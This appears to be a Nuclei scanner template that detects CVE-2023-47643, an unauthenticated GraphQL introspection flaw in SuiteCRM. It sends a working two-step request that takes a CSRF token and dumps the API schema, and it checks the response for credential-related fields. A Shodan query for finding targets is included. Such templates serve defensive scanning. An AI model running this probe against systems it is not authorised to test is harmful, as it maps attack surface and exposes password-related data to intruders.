67 lines
3.8 KiB
YAML
67 lines
3.8 KiB
YAML
id: CVE-2023-47643
|
|
|
|
info:
|
|
name: SuiteCRM Unauthenticated Graphql Introspection
|
|
author: isacaya
|
|
severity: medium
|
|
description: |
|
|
Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.
|
|
impact: |
|
|
An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash.
|
|
remediation: |
|
|
Update to version 8.4.2.
|
|
reference:
|
|
- https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-47643
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2023-47643
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00063
|
|
cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
product: suitecrm
|
|
vendor: salesagility
|
|
shodan-query: title:"SuiteCRM"
|
|
tags: cve,cve2023,graphql,suitecrm,introspection
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /api/graphql HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
X-XSRF-TOKEN: {{csrftoken}}
|
|
|
|
{"query":"query IntrospectionQuery {\r\n __schema {\r\n \r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n \r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n \r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n \r\n \r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "userHash"
|
|
- "authenticateId"
|
|
- "systemGeneratedPassword"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrftoken
|
|
group: 1
|
|
part: header
|
|
regex:
|
|
- "XSRF-TOKEN=([^;]+)"
|
|
internal: true
|
|
# digest: 4a0a004730450221009867ad8a1d9d6ee3be61f018a8148d4cce2490309e5b9b91976fe18caa6b823d02204bde4220f162aeb9c5b07eb8c3a7a6fc0379c2b4408a5457efeabf457cb3f75f:922c64590222798bb761d5b6d8e72950 |